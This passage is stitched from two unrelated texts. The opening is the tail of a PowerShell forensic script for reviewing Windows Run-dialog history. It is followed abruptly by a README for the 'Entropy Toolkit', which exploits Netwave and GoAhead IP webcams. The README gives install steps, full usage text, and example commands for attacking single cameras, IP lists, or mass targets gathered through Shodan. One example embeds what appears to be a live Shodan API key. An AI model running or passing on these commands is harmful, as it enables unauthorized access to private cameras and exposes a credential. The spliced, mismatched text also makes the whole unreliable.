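            Command = ($raw -replace '\\1$', '')   # strip the "\1" terminator
        }
    }
}

# Triage view: every Run-dialog command, newest first, then only those that
# launch an executable out of a Temp directory (pattern chosen for this example;
# tune it to your environment's baseline).
Get-RunMRUHistory | Format-Table -AutoSize
Get-RunMRUHistory |
    Where-Object { $_.Command -match '(?i)\\Temp\\[^"]*\.exe' } |
    Format-Table -AutoSize
```

An empty result proves little on its own, since the page itself notes the key can be cleared; correlate with RDP logon events and process creation telemetry from the same window.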



Entropy Toolkit - A Set Of Tools To Exploit Netwave And GoAhead IP Webcams


Entropy Toolkit is a set of tools to exploit Netwave and GoAhead IP webcams. Entropy is a powerful toolkit for webcam penetration testing.

Getting started

Entropy installation
cd entropy
chmod +x install.sh
./install.sh

Entropy uninstallation
cd entropy
chmod +x uninstall.sh
./uninstall.sh

Entropy Toolkit execution
entropy -h
usage: entropy [-h] [-b [1|2]] [-o <outputfile>] [--timeout <timeout>]
[-t <tasks>] [-c <count>] [-q | -v]
[-a <address> | -i <inputfile> | --shodan <API> | --zoomeye <API>]
[-u]

optional arguments:
-h, --help show this help message and exit
-b [1|2], --brand [1|2]
Choose the brand of IP Webcam. (1)Netwave, (2)GoAhead.
-o <outputfile>, --output <outputfile>
Output into path you input.
--timeout <timeout> Timeout in seconds.
-t <tasks>, --task <tasks>
Run tasks number of connects in parallel.
-c <count>, --count <count>
The number of IP you want to get from ZoomEye.
-q, --quiet Quiet mode.
-v, --verbose Verbose mode.
-a <address>, --address <address>
IP:port address of the webcam.
-i <inputfile>, --input <inputfile>
List of IP:port addresses of webcams.
--shodan <API> Your Shodan API key.
--zoomeye <API> Your ZoomEye API key.
-u, --update Update Entropy Toolkit.

Entropy Toolkit examples
Example of exploiting a single webcam (the help text above maps -a to a single IP:port address)
entropy -b 1 -a 192.168.1.100:80 -v
Example of exploiting webcams from a file (-i takes the input file)
entropy -b 2 -i iplist.txt -v
Example of exploiting webcams using Shodan
entropy -b 2 -v --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

Entropy Toolkit disclaimer
Usage of the Entropy Toolkit for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

